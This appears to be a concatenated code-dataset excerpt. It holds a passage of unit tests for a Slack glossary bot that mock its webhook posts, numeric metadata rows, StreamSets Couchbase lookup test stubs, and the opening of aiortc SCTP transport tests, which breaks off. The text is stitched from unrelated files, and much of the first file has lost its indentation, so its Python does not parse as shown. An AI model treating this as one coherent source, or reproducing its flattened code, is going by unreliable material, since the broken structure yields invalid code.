self.assertEqual(interaction_check.action, u'found')
def test_get_definition_with_special_characters(self):
        ''' We can successfully set and get a definition with special characters from the bot
'''
# set & test a definition
self.post_command(text=u'EW = ™¥∑ø∂∆∫')
filter = Definition.term == u'EW'
definition_check = self.db.session.query(Definition).filter(filter).first()
self.assertIsNotNone(definition_check)
self.assertEqual(definition_check.term, u'EW')
self.assertEqual(definition_check.definition, u'™¥∑ø∂∆∫')
# capture the bot's POST to the incoming webhook and test its content
def response_content(url, request):
if 'hooks.example.com' in url.geturl():
payload = json.loads(request.body)
self.assertIsNotNone(payload['username'])
self.assertIsNotNone(payload['text'])
self.assertTrue(u'glossie' in payload['text'])
self.assertTrue(u'gloss EW' in payload['text'])
self.assertEqual(payload['channel'], u'123456')
self.assertIsNotNone(payload['icon_emoji'])
attachment = payload['attachments'][0]
self.assertIsNotNone(attachment)
self.assertEqual(attachment['title'], u'EW')
self.assertEqual(attachment['text'], u'™¥∑ø∂∆∫')
self.assertIsNotNone(attachment['color'])
self.assertIsNotNone(attachment['fallback'])
return response(200)
# send a POST to the bot to request the definition
with HTTMock(response_content):
fake_response = self.post_command(text=u'EW')
self.assertTrue(fake_response.status_code in range(200, 299), fake_response.status_code)
# the request was recorded in the interactions table
interaction_check = self.db.session.query(Interaction).first()
self.assertIsNotNone(interaction_check)
self.assertEqual(interaction_check.user_name, u'glossie')
self.assertEqual(interaction_check.term, u'EW')
self.assertEqual(interaction_check.action, u'found')
def test_request_nonexistent_definition(self):
''' Test requesting a non-existent definition
'''
# send a POST to the bot to request the definition
robo_response = self.post_command(text=u'EW')
self.assertTrue(u'has no definition for' in robo_response.data)
# the request was recorded in the interactions table
interaction_check = self.db.session.query(Interaction).first()
self.assertIsNotNone(interaction_check)
self.assertEqual(interaction_check.user_name, u'glossie')
self.assertEqual(interaction_check.term, u'EW')
self.assertEqual(interaction_check.action, u'not_found')
def test_get_definition_with_image(self):
''' We can get a properly formatted definition with an image from the bot
'''
# set & test a definition
self.post_command(text=u'EW = http://example.com/ew.gif')
filter = Definition.term == u'EW'
definition_check = self.db.session.query(Definition).filter(filter).first()
self.assertIsNotNone(definition_check)
self.assertEqual(definition_check.term, u'EW')
self.assertEqual(definition_check.definition, u'http://example.com/ew.gif')
# capture the bot's POST to the incoming webhook and test its content
def response_content(url, request):
if 'hooks.example.com' in url.geturl():
payload = json.loads(request.body)
self.assertIsNotNone(payload['username'])
self.assertIsNotNone(payload['text'])
self.assertTrue(u'glossie' in payload['text'])
self.assertTrue(u'gloss EW' in payload['text'])
self.assertEqual(payload['channel'], u'123456')
self.assertIsNotNone(payload['icon_emoji'])
attachment = payload['attachments'][0]
self.assertIsNotNone(attachment)
self.assertEqual(attachment['title'], u'EW')
self.assertEqual(attachment['text'], u'http://example.com/ew.gif')
self.assertEqual(attachment['image_url'], u'http://example.com/ew.gif')
self.assertIsNotNone(attachment['color'])
self.assertIsNotNone(attachment['fallback'])
return response(200)
# send a POST to the bot to request the definition
with HTTMock(response_content):
fake_response = self.post_command(text=u'EW')
self.assertTrue(fake_response.status_code in range(200, 299), fake_response.status_code)
def test_delete_definition(self):
''' A definition can be deleted from the database
'''
# first set a value in the database and verify that it's there
self.post_command(text=u'EW = Eligibility Worker')
filter = Definition.term == u'EW'
definition_check = self.db.session.query(Definition).filter(filter).first()
self.assertIsNotNone(definition_check)
self.assertEqual(definition_check.term, u'EW')
self.assertEqual(definition_check.definition, u'Eligibility Worker')
# now delete the value and verify that it's gone
robo_response = self.post_command(text=u'delete EW')
self.assertTrue(u'has deleted the definition for' in robo_response.data)
definition_check = self.db.session.query(Definition).filter(filter).first()
self.assertIsNone(definition_check)
def test_get_stats(self):
''' Stats are properly returned by the bot
'''
# set and get a definition to generate some stats
self.post_command(text=u'EW = Eligibility Worker')
self.post_command(text=u'EW')
# capture the bot's POST to the incoming webhook and test its content
def response_content(url, request):
if 'hooks.example.com' in url.geturl():
payload = json.loads(request.body)
self.assertIsNotNone(payload['username'])
self.assertIsNotNone(payload['text'])
self.assertTrue(u'glossie' in payload['text'])
self.assertTrue(u'gloss stats' in payload['text'])
self.assertEqual(payload['channel'], u'123456')
self.assertIsNotNone(payload['icon_emoji'])
attachment = payload['attachments'][0]
self.assertIsNotNone(attachment)
self.assertIsNotNone(attachment['title'])
self.assertTrue(u'I have definitions for 1 term' in attachment['text'])
self.assertTrue(u'1 person has defined terms' in attachment['text'])
self.assertTrue(u'I\'ve been asked for definitions 1 time' in attachment['text'])
self.assertIsNotNone(attachment['color'])
self.assertIsNotNone(attachment['fallback'])
return response(200)
# send a POST to the bot to request stats
with HTTMock(response_content):
fake_response = self.post_command(text=u'stats')
self.assertTrue(fake_response.status_code in range(200, 299), fake_response.status_code)
def test_get_stats_on_empty_database(self):
''' A coherent message is returned when requesting stats on an empty database
'''
# capture the bot's POST to the incoming webhook and test its content
def response_content(url, request):
if 'hooks.example.com' in url.geturl():
payload = json.loads(request.body)
self.assertIsNotNone(payload['username'])
self.assertIsNotNone(payload['text'])
self.assertTrue(u'glossie' in payload['text'])
self.assertTrue(u'gloss stats' in payload['text'])
self.assertEqual(payload['channel'], u'123456')
self.assertIsNotNone(payload['icon_emoji'])
attachment = payload['attachments'][0]
self.assertIsNotNone(attachment)
self.assertIsNotNone(attachment['title'])
self.assertTrue(u'I don\'t have any definitions' in attachment['text'])
self.assertTrue(u'Nobody has defined terms' in attachment['text'])
self.assertTrue(u'Nobody has asked me for definitions' in attachment['text'])
self.assertIsNotNone(attachment['color'])
self.assertIsNotNone(attachment['fallback'])
return response(200)
# send a POST to the bot to request stats
with HTTMock(response_content):
fake_response = self.post_command(text=u'stats')
self.assertTrue(fake_response.status_code in range(200, 299), fake_response.status_code)
def test_get_learnings(self):
''' Learnings are properly returned by the bot
'''
# set some values in the database
letters = [u'K', u'L', u'M', u'N', u'Ó', u'P', u'Q', u'R', u'S', u'T', u'U', u'V']
for letter in letters:
self.post_command(text=u'{letter}W = {letter}ligibility Worker'.format(letter=letter))
# capture the bot's POST to the incoming webhook and test its content
def response_content(url, request):
if 'hooks.example.com' in url.geturl():
payload = json.loads(request.body)
self.assertIsNotNone(payload['username'])
self.assertIsNotNone(payload['text'])
self.assertTrue(u'glossie' in payload['text'])
self.assertTrue(u'gloss learnings' in payload['text'])
self.assertEqual(payload['channel'], u'123456')
self.assertIsNotNone(payload['icon_emoji'])
attachment = payload['attachments'][0]
self.assertIsNotNone(attachment)
self.assertIsNotNone(attachment['title'])
self.assertTrue(u'I recently learned definitions for' in attachment['text'])
self.assertTrue(u'KW' in attachment['text'])
self.assertTrue(u'LW' in attachment['text'])
self.assertTrue(u'MW' in attachment['text'])
self.assertTrue(u'NW' in attachment['text'])
self.assertTrue(u'ÓW' in attachment['text'])
self.assertTrue(u'PW' in attachment['text'])
self.assertTrue(u'QW' in attachment['text'])
self.assertTrue(u'RW' in attachment['text'])
self.assertTrue(u'SW' in attachment['text'])
self.assertTrue(u'TW' in attachment['text'])
self.assertTrue(u'UW' in attachment['text'])
self.assertTrue(u'VW' in attachment['text'])
self.assertIsNotNone(attachment['color'])
self.assertIsNotNone(attachment['fallback'])
return response(200)
# send a POST to the bot to request learnings
with HTTMock(response_content):
fake_response = self.post_command(text=u'learnings')
self.assertTrue(fake_response.status_code in range(200, 299), fake_response.status_code)
def test_random_learnings(self):
''' Learnings are returned in random order when requested
'''
# set some values in the database
letters = [u'E', u'F', u'G', u'H', u'I', u'J', u'K', u'L', u'M', u'N', u'O', u'P', u'Q', u'R', u'S']
for letter in letters:
self.post_command(text=u'{letter}W = {letter}ligibility Worker'.format(letter=letter))
# get chronological learnings
robo_response = self.post_command(text=u'shh learnings')
self.assertEqual(robo_response.status_code, 200)
control = robo_response.data
# get a few random learnings
robo_response = self.post_command(text=u'shh learnings random')
self.assertEqual(robo_response.status_code, 200)
random1 = robo_response.data
robo_response = self.post_command(text=u'shh learnings random')
self.assertEqual(robo_response.status_code, 200)
random2 = robo_response.data
robo_response = self.post_command(text=u'shh learnings random')
self.assertEqual(robo_response.status_code, 200)
random3 = robo_response.data
# if they're all equal, we've failed
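        # (this check is probabilistic: a random ordering could in principle match the
        # chronological one, but with this many terms a spurious failure is vanishingly rare)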
self.assertFalse(control == random1 and control == random2 and control == random3)
def test_alphabetical_learnings(self):
        ''' Learnings are returned in alphabetical order when requested
'''
# set some values in the database
letters = [u'E', u'G', u'I', u'K', u'M', u'O', u'Q', u'S', u'R', u'P', u'N', u'L', u'J', u'H', u'F']
check = []
for letter in letters:
self.post_command(text=u'{letter}W = {letter}ligibility Worker'.format(letter=letter))
check.insert(0, u'{}W'.format(letter))
desc_check = check[:12]
alpha_check = list(check)
alpha_check.sort()
alpha_check = alpha_check[:12]
# get chronological learnings
robo_response = self.post_command(text=u'learnings')
self.assertEqual(robo_response.status_code, 200)
# get alphabetical learnings
robo_response = self.post_command(text=u'learnings alpha')
self.assertEqual(robo_response.status_code, 200)
self.assertTrue(u', '.join(alpha_check) in robo_response.data)
def test_random_offset_learnings(self):
        ''' An offset group of learnings is returned in random order when requested
'''
# set some values in the database
letters = [u'E', u'F', u'G', u'H', u'I', u'J', u'K', u'L', u'M', u'N', u'O', u'P', u'Q', u'R', u'S']
for letter in letters:
self.post_command(text=u'{letter}W = {letter}ligibility Worker'.format(letter=letter))
# get chronological learnings
robo_response = self.post_command(text=u'learnings 7 4')
self.assertEqual(robo_response.status_code, 200)
control = robo_response.data
# get a list of the terms from the control string
check_terms = control.split(', ')
        check_terms[0] = check_terms[0][-2:]  # the first item still carries the message prefix; keep only its two-character term
# get a few random learnings
robo_response = self.post_command(text=u'learnings random 7 4')
self.assertEqual(robo_response.status_code, 200)
random1 = robo_response.data
robo_response = self.post_command(text=u'learnings random 7 4')
self.assertEqual(robo_response.status_code, 200)
random2 = robo_response.data
robo_response = self.post_command(text=u'learnings random 7 4')
self.assertEqual(robo_response.status_code, 200)
random3 = robo_response.data
# if they're all equal, we've failed
self.assertFalse(control == random1 and control == random2 and control == random3)
# but they should all have the same elements
for term in check_terms:
self.assertTrue(term in random1)
self.assertTrue(term in random2)
self.assertTrue(term in random3)
def test_all_learnings(self):
''' All learnings are returned when requested
'''
# set some values in the database
letters = [u'E', u'F', u'G', u'H', u'I', u'J', u'K', u'L', u'M', u'N', u'O', u'P', u'Q', u'R', u'S', u'T', u'U', u'V', u'W', u'X']
check = []
for letter in letters:
self.post_command(text=u'{letter}W = {letter}ligibility Worker'.format(letter=letter))
check.insert(0, u'{}W'.format(letter))
# get all learnings
robo_response = self.post_command(text=u'learnings all')
self.assertEqual(robo_response.status_code, 200)
self.assertTrue(u', '.join(check) in robo_response.data)
# if 'all' is part of the command, other limiting params are ignored
robo_response = self.post_command(text=u'learnings all 5')
self.assertEqual(robo_response.status_code, 200)
self.assertTrue(u', '.join(check) in robo_response.data)
robo_response = self.post_command(text=u'learnings 5 3 all')
self.assertEqual(robo_response.status_code, 200)
self.assertTrue(u', '.join(check) in robo_response.data)
robo_response = self.post_command(text=u'learnings all 3 5')
self.assertEqual(robo_response.status_code, 200)
self.assertTrue(u', '.join(check) in robo_response.data)
def test_some_learnings(self):
''' Only a few learnings are returned when requested
'''
# set some values in the database
letters = [u'E', u'F', u'G', u'H', u'I', u'J', u'K', u'L', u'M', u'N', u'O', u'P', u'Q', u'R', u'S', u'T', u'U', u'V', u'W', u'X']
for letter in letters:
self.post_command(text=u'{letter}W = {letter}ligibility Worker'.format(letter=letter))
limit = 7
check = [u'{}W'.format(item) for item in list(reversed(letters[-limit:]))]
# get some learnings
robo_response = self.post_command(text=u'learnings {}'.format(limit))
self.assertEqual(robo_response.status_code, 200)
self.assertTrue(u', '.join(check) in robo_response.data)
def test_offset_learnings(self):
        ''' An offset slice of learnings is returned when requested
'''
# set some values in the database
letters = [u'E', u'F', u'G', u'H', u'I', u'J', u'K', u'L', u'M', u'N', u'O', u'P', u'Q', u'R', u'S', u'T', u'U', u'V', u'W', u'X']
for letter in letters:
self.post_command(text=u'{letter}W = {letter}ligibility Worker'.format(letter=letter))
limit = 7
offset = 11
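        # learnings come back newest-first, so skipping `offset` of the most recent terms
        # and taking `limit` of the rest corresponds to this reversed slice of the letters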
check = [u'{}W'.format(item) for item in list(reversed(letters[-(limit + offset):-offset]))]
# get some learnings
robo_response = self.post_command(text=u'learnings {} {}'.format(limit, offset))
self.assertEqual(robo_response.status_code, 200)
self.assertTrue(u', '.join(check) in robo_response.data)
def test_learnings_language(self):
''' Language describing learnings is numerically accurate
'''
# ask for learnings before any values have been set
robo_response = self.post_command(text=u'learnings')
self.assertEqual(robo_response.status_code, 200)
self.assertTrue(u'I haven\'t learned any definitions yet.' in robo_response.data)
# when one value has been set
self.post_command(text=u'EW = Eligibility Worker')
robo_response = self.post_command(text=u'learnings')
self.assertEqual(robo_response.status_code, 200)
self.assertTrue(u'I recently learned the definition for' in robo_response.data)
# when more than one value has been set
self.post_command(text=u'FW = Fligibility Worker')
robo_response = self.post_command(text=u'learnings')
self.assertEqual(robo_response.status_code, 200)
self.assertTrue(u'I recently learned definitions for' in robo_response.data)
def test_get_help(self):
''' Help is properly returned by the bot
'''
# testing different chunks of help text with each response
robo_response = self.post_command(text=u'help')
self.assertTrue(u'to show the definition for a term' in robo_response.data)
robo_response = self.post_command(text=u'?')
self.assertTrue(u'to set the definition for a term' in robo_response.data)
robo_response = self.post_command(text=u'')
self.assertTrue(u'to delete the definition for a term' in robo_response.data)
robo_response = self.post_command(text=u' ')
self.assertTrue(u'to see this message' in robo_response.data)
def test_custom_slash_command_for_private_requests(self):
''' A slash command other than /gloss is echoed in the bot's response
'''
test_command = u'/gg'
# the help command
robo_response = self.post_command(text=u'help', slash_command=test_command)
self.assertTrue(u'*{}'.format(test_command) in robo_response.data)
self.assertFalse(u'*/gloss' in robo_response.data)
# ask for a definition that doesn't exist
robo_response = self.post_command(text=u'EW', slash_command=test_command)
self.assertTrue(u'*{}'.format(test_command) in robo_response.data)
self.assertFalse(u'*/gloss' in robo_response.data)
# get a definition that does exist
self.post_command(text=u'EW = Eligibility Worker', slash_command=test_command)
robo_response = self.post_command(text=u'EW', slash_command=test_command)
self.assertTrue(u'{}'.format(test_command) in robo_response.data)
self.assertFalse(u'/gloss' in robo_response.data)
# get the error message for a bogus set
robo_response = self.post_command(text=u'AW =', slash_command=test_command)
self.assertTrue(u'*{}'.format(test_command) in robo_response.data)
self.assertFalse(u'*/gloss' in robo_response.data)
def test_custom_slash_command_for_public_stats(self):
''' A slash command other than /gloss is echoed in the bot's response
to a public stats request.
'''
test_command = u'/gg'
# set and get a definition to generate some stats
self.post_command(text=u'EW = Eligibility Worker')
self.post_command(text=u'EW')
# capture the bot's POST to the incoming webhook and test its content
def response_content(url, request):
if 'hooks.example.com' in url.geturl():
payload = json.loads(request.body)
self.assertIsNotNone(payload['text'])
self.assertTrue(u'{command} stats'.format(command=test_command) in payload['text'])
return response(200)
# send a POST to the bot to request stats
with HTTMock(response_content):
fake_response = self.post_command(text=u'stats', slash_command=test_command)
self.assertTrue(fake_response.status_code in range(200, 299), fake_response.status_code)
def test_custom_slash_command_for_public_definition(self):
''' A slash command other than /gloss is echoed in the bot's response
to a public definition request.
'''
test_command = u'/gg'
# set and get a definition to generate some stats
self.post_command(text=u'EW = Eligibility Worker')
# capture the bot's POST to the incoming webhook and test its content
def response_content(url, request):
if 'hooks.example.com' in url.geturl():
payload = json.loads(request.body)
self.assertIsNotNone(payload['text'])
self.assertTrue(u'{command} EW'.format(command=test_command) in payload['text'])
return response(200)
# send a POST to the bot to request stats
with HTTMock(response_content):
fake_response = self.post_command(text=u'EW', slash_command=test_command)
self.assertTrue(fake_response.status_code in range(200, 299), fake_response.status_code)
def test_custom_slash_command_for_public_learnings(self):
''' A slash command other than /gloss is echoed in the bot's response
to a public learnings request.
'''
test_command = u'/gg'
# capture the bot's POST to the incoming webhook and test its content
def response_content(url, request):
if 'hooks.example.com' in url.geturl():
payload = json.loads(request.body)
self.assertIsNotNone(payload['text'])
self.assertTrue(u'{command} learnings'.format(command=test_command) in payload['text'])
return response(200)
# send a POST to the bot to request stats
with HTTMock(response_content):
fake_response = self.post_command(text=u'learnings', slash_command=test_command)
self.assertTrue(fake_response.status_code in range(200, 299), fake_response.status_code)
def test_get_quiet_definition(self):
''' The bot will send a quiet definition when told to do so
'''
# set & test a definition
self.post_command(text=u'EW = Eligibility Worker')
filter = Definition.term == u'EW'
definition_check = self.db.session.query(Definition).filter(filter).first()
self.assertIsNotNone(definition_check)
self.assertEqual(definition_check.term, u'EW')
self.assertEqual(definition_check.definition, u'Eligibility Worker')
# send a POST to the bot to request the quiet definition
robo_response = self.post_command(text=u'EW')
self.assertTrue(u'glossie' in robo_response.data)
self.assertTrue(u'EW: Eligibility Worker' in robo_response.data)
# at least one request was recorded in the interactions table
interaction_check = self.db.session.query(Interaction).first()
self.assertIsNotNone(interaction_check)
self.assertEqual(interaction_check.user_name, u'glossie')
self.assertEqual(interaction_check.term, u'EW')
self.assertEqual(interaction_check.action, u'found')
def test_bad_set_commands(self):
''' We get the right error back when sending bad set commands
'''
robo_response = self.post_command(text=u'EW =')
self.assertTrue(u'You can set definitions like this' in robo_response.data)
robo_response = self.post_command(text=u'=')
self.assertTrue(u'You can set definitions like this' in robo_response.data)
robo_response = self.post_command(text=u'= = =')
self.assertTrue(u'You can set definitions like this' in robo_response.data)
def test_bad_image_urls_rejected(self):
''' Bad image URLs are not sent in the attachment's image_url parameter
'''
# set some definitions with bad image URLs
self.post_command(text=u'EW = http://kittens.gif')
self.post_command(text=u'FW = httpdoggie.jpeg')
self.post_command(text=u'GW = http://stupid/goldfish.bmp')
self.post_command(text=u'HW = http://s.mlkshk-cdn.com/r/13ILU')
# capture the bot's POSTs to the incoming webhook and test the content
def response_content(url, request):
if 'hooks.example.com' in url.geturl():
payload = json.loads(request.body)
attachment = payload['attachments'][0]
self.assertIsNotNone(attachment)
self.assertIsNone(attachment['image_url'])
return response(200)
# send POSTs to the bot to request the definitions
with HTTMock(response_content):
fake_response = self.post_command(text=u'EW')
self.assertTrue(fake_response.status_code in range(200, 299), fake_response.status_code)
fake_response = self.post_command(text=u'FW')
self.assertTrue(fake_response.status_code in range(200, 299), fake_response.status_code)
fake_response = self.post_command(text=u'GW')
self.assertTrue(fake_response.status_code in range(200, 299), fake_response.status_code)
fake_response = self.post_command(text=u'HW')
self.assertTrue(fake_response.status_code in range(200, 299), fake_response.status_code)
if __name__ == '__main__':
unittest.main()
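# A minimal, self-contained sketch (not part of the test cases above) of the httmock capture
# pattern these tests rely on; the handler name and webhook path below are illustrative only.
def _demo_httmock_capture():
    import requests
    from httmock import HTTMock, all_requests, response

    @all_requests
    def fake_webhook(url, request):
        # every request issued inside the HTTMock block below is routed here
        # instead of reaching the network
        assert 'hooks.example.com' in url.netloc
        return response(200, 'ok')

    with HTTMock(fake_webhook):
        reply = requests.post('https://hooks.example.com/services/TEST', json={'text': 'hello'})
    assert reply.status_code == 200
    assert reply.text == 'ok'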
48.114322 | 138 | 0.65208 | 4,899 | 38,299 | 4.977955 | 0.078383 | 0.067413 | 0.054127 | 0.068561 | 0.859433 | 0.8434 | 0.807848 | 0.789027 | 0.77041 | 0.745766 | 0 | 0.009997 | 0.239954 | 38,299 | 795 | 139 | 48.174843 | 0.827064 | 0.134834 | 0 | 0.668571 | 0 | 0 | 0.121049 | 0 | 0 | 0 | 0 | 0 | 0.48 | 1 | 0.085714 | false | 0 | 0.015238 | 0 | 0.121905 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7
436f2f143a25f1bfb1fe7c6b6eec8ca32078704e | 5,819 | py | Python
stage/configuration/test_couchbase_lookup_processor.py | Sentienz/datacollector-tests | ca27988351dc3366488098b5db6c85a8be2f7b85 | ["Apache-2.0"] | null | null | null
stage/configuration/test_couchbase_lookup_processor.py | Sentienz/datacollector-tests | ca27988351dc3366488098b5db6c85a8be2f7b85 | ["Apache-2.0"] | 1 | 2019-04-24T11:06:38.000Z | 2019-04-24T11:06:38.000Z
stage/configuration/test_couchbase_lookup_processor.py | anubandhan/datacollector-tests | 301c024c66d68353735256b262b681dd05ba16cc | ["Apache-2.0"] | 2 | 2019-05-24T06:34:37.000Z | 2020-03-30T11:48:18.000Z
import pytest
from streamsets.testframework.decorators import stub
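# The tests below are configuration-coverage stubs: the @stub decorator marks each one as a
# placeholder to be implemented later, and pytest.mark.parametrize expands a test into one
# case per stage_attributes dict.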
@stub
def test_advanced_environment_settings(sdc_builder, sdc_executor):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'authentication_mode': 'BUCKET'}, {'authentication_mode': 'USER'}])
def test_authentication_mode(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
def test_bucket(sdc_builder, sdc_executor):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'authentication_mode': 'BUCKET'}])
def test_bucket_password(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'use_tls': True}])
def test_cipher_suites(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
def test_connect_timeout_in_ms(sdc_builder, sdc_executor):
pass
@stub
def test_disconnect_timeout_in_ms(sdc_builder, sdc_executor):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'lookup_type': 'KV'}])
def test_document_key(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
def test_key_value_timeout_in_ms(sdc_builder, sdc_executor):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'use_tls': True}])
def test_keystore_file(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'use_tls': True}])
def test_keystore_key_algorithm(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'use_tls': True}])
def test_keystore_password(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'keystore_type': 'JKS', 'use_tls': True},
{'keystore_type': 'PKCS12', 'use_tls': True}])
def test_keystore_type(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'lookup_type': 'KV'}, {'lookup_type': 'N1QL'}])
def test_lookup_type(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'missing_value_behavior': 'ERROR'}, {'missing_value_behavior': 'PASS'}])
def test_missing_value_behavior(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'lookup_type': 'N1QL', 'multiple_value_behavior': 'FIRST'},
{'lookup_type': 'N1QL', 'multiple_value_behavior': 'MULTI'}])
def test_multiple_value_behavior(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'lookup_type': 'N1QL'}])
def test_n1ql_query(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
def test_node_list(sdc_builder, sdc_executor):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'on_record_error': 'DISCARD'},
{'on_record_error': 'STOP_PIPELINE'},
{'on_record_error': 'TO_ERROR'}])
def test_on_record_error(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'authentication_mode': 'USER'}])
def test_password(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
def test_preconditions(sdc_builder, sdc_executor):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'lookup_type': 'KV', 'return_properties': True}, {'lookup_type': 'N1QL'}])
def test_property_mappings(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'lookup_type': 'N1QL'}])
def test_query_timeout_in_ms(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
def test_required_fields(sdc_builder, sdc_executor):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'lookup_type': 'KV', 'return_properties': False},
{'lookup_type': 'KV', 'return_properties': True}])
def test_return_properties(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'lookup_type': 'KV', 'return_properties': False}])
def test_sdc_field(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'lookup_type': 'N1QL', 'submit_as_prepared_statement': False},
{'lookup_type': 'N1QL', 'submit_as_prepared_statement': True}])
def test_submit_as_prepared_statement(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'use_tls': True}])
def test_transport_protocols(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'use_tls': True}])
def test_truststore_file(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'use_tls': True}])
def test_truststore_password(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'use_tls': True}])
def test_truststore_trust_algorithm(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'truststore_type': 'JKS', 'use_tls': True},
{'truststore_type': 'PKCS12', 'use_tls': True}])
def test_truststore_type(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'use_tls': False}, {'use_tls': True}])
def test_use_tls(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'authentication_mode': 'USER'}])
def test_user_name(sdc_builder, sdc_executor, stage_attributes):
pass
27.975962 | 121 | 0.720914 | 707 | 5,819 | 5.558699 | 0.113154 | 0.198473 | 0.112468 | 0.181679 | 0.847328 | 0.816285 | 0.788295 | 0.745293 | 0.745293 | 0.733079 | 0 | 0.002619 | 0.147104 | 5,819 | 207 | 122 | 28.111111 | 0.78924 | 0 | 0 | 0.583942 | 0 | 0 | 0.208147 | 0.025095 | 0 | 0 | 0 | 0 | 0 | 1 | 0.248175 | false | 0.284672 | 0.014599 | 0 | 0.262774 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 9
43856960b785ebf1b364ad9964ab651a69b42ea2 | 92,156 | py | Python
tests/test_rtcsctptransport.py | AlexVestin/cloneaio | 5792c819482ed7e19252b8b0c00532a0932e0b3b | ["BSD-3-Clause"] | 4 | 2019-09-02T22:26:03.000Z | 2020-09-02T18:13:29.000Z
tests/test_rtcsctptransport.py | AlexVestin/cloneaio | 5792c819482ed7e19252b8b0c00532a0932e0b3b | ["BSD-3-Clause"] | null | null | null
tests/test_rtcsctptransport.py | AlexVestin/cloneaio | 5792c819482ed7e19252b8b0c00532a0932e0b3b | ["BSD-3-Clause"] | 2 | 2021-03-04T04:05:54.000Z | 2021-03-25T07:33:43.000Z
import asyncio
from unittest import TestCase
from unittest.mock import patch
from aiortc.exceptions import InvalidStateError
from aiortc.rtcdatachannel import RTCDataChannel, RTCDataChannelParameters
from aiortc.rtcsctptransport import (SCTP_DATA_FIRST_FRAG, SCTP_DATA_LAST_FRAG,
SCTP_DATA_UNORDERED, USERDATA_MAX_LENGTH,
AbortChunk, CookieEchoChunk, DataChunk,
ErrorChunk, ForwardTsnChunk,
HeartbeatAckChunk, HeartbeatChunk,
InboundStream, InitChunk, ReconfigChunk,
RTCSctpCapabilities, RTCSctpTransport,
SackChunk, ShutdownAckChunk,
ShutdownChunk, ShutdownCompleteChunk,
StreamAddOutgoingParam,
StreamResetOutgoingParam,
StreamResetResponseParam, parse_packet,
serialize_packet, tsn_minus_one,
tsn_plus_one)
from .utils import dummy_dtls_transport_pair, load, run
def outstanding_tsns(client):
return [chunk.tsn for chunk in client._sent_queue]
def queued_tsns(client):
return [chunk.tsn for chunk in client._outbound_queue]
def track_channels(transport):
channels = []
@transport.on('datachannel')
def on_datachannel(channel):
channels.append(channel)
return channels
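# wait_for_outcome polls both transports until each reaches a final association state
# (ESTABLISHED or CLOSED), giving up after 100 iterations of 0.1 s (about ten seconds).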
async def wait_for_outcome(client, server):
final = [
RTCSctpTransport.State.ESTABLISHED,
RTCSctpTransport.State.CLOSED,
]
for i in range(100):
if client._association_state in final and server._association_state in final:
break
await asyncio.sleep(0.1)
class SctpPacketTest(TestCase):
def roundtrip_packet(self, data):
source_port, destination_port, verification_tag, chunks = parse_packet(data)
self.assertEqual(source_port, 5000)
self.assertEqual(destination_port, 5000)
self.assertEqual(len(chunks), 1)
output = serialize_packet(source_port, destination_port, verification_tag, chunks[0])
self.assertEqual(output, data)
return chunks[0]
def test_parse_init(self):
data = load('sctp_init.bin')
chunk = self.roundtrip_packet(data)
self.assertTrue(isinstance(chunk, InitChunk))
self.assertEqual(chunk.type, 1)
self.assertEqual(chunk.flags, 0)
self.assertEqual(len(chunk.body), 82)
self.assertEqual(repr(chunk), 'InitChunk(flags=0)')
def test_parse_init_invalid_checksum(self):
data = load('sctp_init.bin')
data = data[0:8] + b'\x01\x02\x03\x04' + data[12:]
with self.assertRaises(ValueError) as cm:
self.roundtrip_packet(data)
self.assertEqual(str(cm.exception), 'SCTP packet has invalid checksum')
def test_parse_init_truncated_packet_header(self):
data = load('sctp_init.bin')[0:10]
with self.assertRaises(ValueError) as cm:
self.roundtrip_packet(data)
